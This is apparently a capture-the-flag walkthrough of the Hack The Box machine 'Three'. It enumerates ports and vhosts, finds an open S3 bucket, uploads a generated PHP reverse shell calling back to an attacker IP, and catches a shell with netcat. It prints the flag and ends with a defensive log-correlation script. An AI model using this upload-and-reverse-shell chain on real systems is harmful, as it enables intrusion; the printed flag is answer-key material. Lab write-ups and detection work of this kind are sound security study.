Port scanning with nmap, or you can use recon:

┌──(root@ghost)-[/home/ghost]
└─# recon three.htb

    .o oOOOOOOOo                                            OOOo
    Ob.OOOOOOOo  OOOo.      oOOo.                      .adOOOOOOO
    OboO"""""""""""".OOo. .oOOOOOo.    OOOo.oOOOOOo.."""""""""'OO
    OOP.oOOOOOOOOOOO "POOOOOOOOOOOo.   `"OOOOOOOOOP,OOOOOOOOOOOB'
    `O'OOOO'     `OOOOo"OOOOOOOOOOO` .adOOOOOOOOO"oOOO'    `OOOOo
    .OOOO'            `OOOOOOOOOOOOOOOOOOOOOOOOOO'            `OO
    OOOOO                 '"OOOOOOOOOOOOOOOO"`                oOO
   oOOOOOba.                .adOOOOOOOOOOba               .adOOOOo.
  oOOOOOOOOOOOOOba.    .adOOOOOOOOOO@^OOOOOOOba.     .adOOOOOOOOOOOO
 OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO"`  '"OOOOOOOOOOOOO.OOOOOOOOOOOOOO
 "OOOO"       "YOoOOOOMOIONODOO"`  .   '"OOROAOPOEOOOoOY"     "OOO"
    Y           'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?'         :`
    :            .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO?         .
    .            oOOP"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO"OOo
                 '%o  OOOO"%OOOO%"%OOOOO"OOOOOO"OOO':
                      `$"  `OOOO' `O"Y ' `OOOO'  o             .
    .                  .     OP"          : o     .
                              :
                              .

[R3C0N] by 0bfxgh0st 4 WWA with ❤

Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-09 07:18 EDT
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 07:18
Completed NSE at 07:18, 0.00s elapsed
Initiating Ping Scan at 07:18
Scanning three.htb (10.129.67.204) [4 ports]
Completed Ping Scan at 07:18, 0.09s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 07:18
Scanning three.htb (10.129.67.204) [65535 ports]
Discovered open port 80/tcp on 10.129.67.204
Discovered open port 22/tcp on 10.129.67.204
Completed SYN Stealth Scan at 07:18, 15.39s elapsed (65535 total ports)
NSE: Script scanning 10.129.67.204.
Initiating NSE at 07:18
Completed NSE at 07:18, 0.00s elapsed
Nmap scan report for three.htb (10.129.67.204)
Host is up (0.070s latency).
Not shown: 63274 closed tcp ports (reset), 2259 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

NSE: Script Post-scanning.
Initiating NSE at 07:18
Completed NSE at 07:18, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 15.87 seconds
           Raw packets sent: 76595 (3.370MB) | Rcvd: 66674 (2.667MB)


[i] [Server info]
http://three.htb:80 [200 OK] Apache[2.4.29], Country[RESERVED][ZZ], Email[mail@thetoppers.htb], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.29 (Ubuntu)], IP[10.129.67.204], Script, Title[The Toppers]                                                                                                                                                                                                

[+] [fuzzin server]

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Tue Aug  9 07:18:43 2022
URL_BASE: http://three.htb:80/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Recursive

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://three.htb:80/ ----
==> DIRECTORY: http://three.htb:80/images/                                                                                                                                                        
+ http://three.htb:80/index.php (CODE:200|SIZE:11952)                                                                                                                                             
+ http://three.htb:80/server-status (CODE:403|SIZE:274)                                                                                                                                           
                                                                                                                                                                                                  
-----------------
END_TIME: Tue Aug  9 07:24:15 2022
DOWNLOADED: 4612 - FOUND: 2

recon reports two open ports: 22 for SSH and 80 for HTTP.

In the Contact section of the site we found a new domain, thetoppers.htb:

┌──(root@ghost)-[/home/ghost]
└─# gobuster vhost -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://thetoppers.htb
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:          http://thetoppers.htb
[+] Method:       GET
[+] Threads:      10
[+] Wordlist:     /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
[+] User Agent:   gobuster/3.1.0
[+] Timeout:      10s
===============================================================
2022/08/09 07:41:06 Starting gobuster in VHOST enumeration mode
===============================================================
Found: s3.thetoppers.htb (Status: 502) [Size: 424]
Found: gc._msdcs.thetoppers.htb (Status: 400) [Size: 306]
                                                         
===============================================================
2022/08/09 07:41:59 Finished
===============================================================

Further enumeration (gobuster in vhost mode) returned two subdomains. After a bit of research on the internet we found more information about s3.

┌──(root@ghost)-[/home/ghost]
└─# recon s3.thetoppers.htb

[OS] Linux (99%)
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-09 07:45 EDT
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 07:45
Completed NSE at 07:45, 0.00s elapsed
Initiating Ping Scan at 07:45
Scanning s3.thetoppers.htb (10.129.67.204) [4 ports]
Completed Ping Scan at 07:45, 0.08s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 07:45
Scanning s3.thetoppers.htb (10.129.67.204) [65535 ports]
Discovered open port 80/tcp on 10.129.67.204
Discovered open port 22/tcp on 10.129.67.204
Completed SYN Stealth Scan at 07:45, 14.59s elapsed (65535 total ports)
NSE: Script scanning 10.129.67.204.
Initiating NSE at 07:45
Completed NSE at 07:45, 0.00s elapsed
Nmap scan report for s3.thetoppers.htb (10.129.67.204)
Host is up (0.088s latency).
rDNS record for 10.129.67.204: three.htb
Not shown: 63546 closed tcp ports (reset), 1987 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

NSE: Script Post-scanning.
Initiating NSE at 07:45
Completed NSE at 07:45, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 15.02 seconds
           Raw packets sent: 72204 (3.177MB) | Rcvd: 64950 (2.598MB)


[i] [Server info]
http://s3.thetoppers.htb:80 [404 Not Found] Access-Control-Allow-Methods[HEAD,GET,PUT,POST,DELETE,OPTIONS,PATCH], Country[RESERVED][ZZ], HTTPServer[hypercorn-h11], IP[10.129.67.204], UncommonHeaders[access-control-allow-origin,access-control-allow-methods,access-control-allow-headers,access-control-expose-headers]

[+] [fuzzin server]

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Tue Aug  9 07:45:47 2022
URL_BASE: http://s3.thetoppers.htb:80/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Recursive

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://s3.thetoppers.htb:80/ ----
+ http://s3.thetoppers.htb:80/graph (CODE:405|SIZE:178)                                                                                                                                            
+ http://s3.thetoppers.htb:80/health (CODE:200|SIZE:888)                                                                                                                                           
+ http://s3.thetoppers.htb:80/server-status (CODE:403|SIZE:282)                                                                                                                                    
                                                                                                                                                                                                   
-----------------
END_TIME: Tue Aug  9 07:53:30 2022
DOWNLOADED: 4612 - FOUND: 3

At this point we can try connecting to it with awscli: run aws configure, and then you can list the bucket contents.

┌──(root@ghost)-[/home/ghost]
└─# aws --endpoint=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb
                           PRE images/
2022-08-09 10:33:25          0 .htaccess
2022-08-09 10:33:25      11952 index.php

We can upload a PHP file, so let's try uploading our favourite shell.

┌──(root@ghost)-[/home/ghost]
└─# shellstorm.sh php-daemon 10.10.15.252 1337 > rev.php

Generating reverse shell

┌──(root@ghost)-[/home/ghost]
└─# aws --endpoint=http://s3.thetoppers.htb s3 cp rev.php s3://thetoppers.htb
upload: ./rev.php to s3://thetoppers.htb/rev.php

Uploading our shell

Time to start a netcat listener and curl the location where rev.php was uploaded, http://thetoppers.htb/rev.php

┌──(root@ghost)-[/home/ghost]
└─# nc -lvp 1337
listening on [any] 1337 ...
connect to [10.10.15.252] from three.htb [10.129.227.248] 57930
Linux three 4.15.0-189-generic #200-Ubuntu SMP Wed Jun 22 19:53:37 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
 14:40:45 up 9 min,  0 users,  load average: 0.02, 0.09, 0.08
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ ls -la /var/www/    
total 16
drwxr-xr-x  3 root root     4096 Jul 19 11:30 .
drwxr-xr-x 13 root root     4096 Jul 19 11:57 ..
-rw-r-----  1 root www-data   33 Jul 19 11:30 flag.txt
drwxr-xr-x  3 root root     4096 Aug  9 14:38 html
$ cat /var/www/flag.txt
a980d99281a28d638ac68b9bf9453c2b
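
From the defender's side, the chain above (a write to the bucket through s3.thetoppers.htb, then a request for the same key on thetoppers.htb) leaves a correlatable trail in the web logs. The following is an added example, not part of the original write-up: it assumes both vhosts log to one file in Apache's vhost_combined format and that uploads use path-style URLs (/bucket/key); the function name, the sample log lines and the client addresses are constructed for illustration.

```python
import re
from datetime import datetime, timedelta

# Apache "vhost_combined" layout: vhost:port client ident user [time] "request" status ...
LINE = re.compile(
    r'^(?P<vhost>[^:\s]+):\d+ (?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) ')
S3_VHOST, WEB_VHOST, BUCKET = "s3.thetoppers.htb", "thetoppers.htb", "thetoppers.htb"
SCRIPT_EXT = (".php", ".phtml", ".phar")  # extensions the web server may execute

# Constructed sample log (not captured from the target).
SAMPLE_LOG = """\
s3.thetoppers.htb:80 203.0.113.7 - - [09/Aug/2022:14:38:02 +0000] "GET /thetoppers.htb?list-type=2 HTTP/1.1" 200 512 "-" "-"
s3.thetoppers.htb:80 203.0.113.7 - - [09/Aug/2022:14:38:40 +0000] "PUT /thetoppers.htb/rev.php HTTP/1.1" 200 0 "-" "-"
s3.thetoppers.htb:80 198.51.100.4 - - [09/Aug/2022:14:39:10 +0000] "PUT /thetoppers.htb/images/band.jpg HTTP/1.1" 200 0 "-" "-"
thetoppers.htb:80 198.51.100.4 - - [09/Aug/2022:14:39:30 +0000] "GET /images/band.jpg HTTP/1.1" 200 90172 "-" "-"
thetoppers.htb:80 198.51.100.4 - - [09/Aug/2022:14:40:01 +0000] "GET /index.php HTTP/1.1" 200 11952 "-" "-"
thetoppers.htb:80 203.0.113.7 - - [09/Aug/2022:14:40:45 +0000] "GET /rev.php HTTP/1.1" 200 0 "-" "-"
"""

def find_upload_then_exec(log_text, window=timedelta(minutes=30)):
    """Return script objects written via the S3 endpoint and later served by the web vhost."""
    uploads, findings = {}, []
    prefix = "/" + BUCKET + "/"
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        path, ok = m["path"].split("?", 1)[0], m["status"].startswith("2")
        if m["vhost"] == S3_VHOST and m["method"] in ("PUT", "POST") and ok:
            # Path-style write: /<bucket>/<key>. Keep only keys the web server would run.
            if path.startswith(prefix) and path.lower().endswith(SCRIPT_EXT):
                uploads["/" + path[len(prefix):]] = (ts, m["client"])
        elif m["vhost"] == WEB_VHOST and ok and path in uploads:
            up_ts, uploader = uploads[path]
            if timedelta(0) <= ts - up_ts <= window:
                findings.append({"path": path, "uploader": uploader,
                                 "requester": m["client"],
                                 "delay_s": int((ts - up_ts).total_seconds())})
    return findings

if __name__ == "__main__":
    for finding in find_upload_then_exec(SAMPLE_LOG):
        print(finding)
```

The image upload and the index.php request in the sample are ignored; only the script key that was written and then fetched is reported.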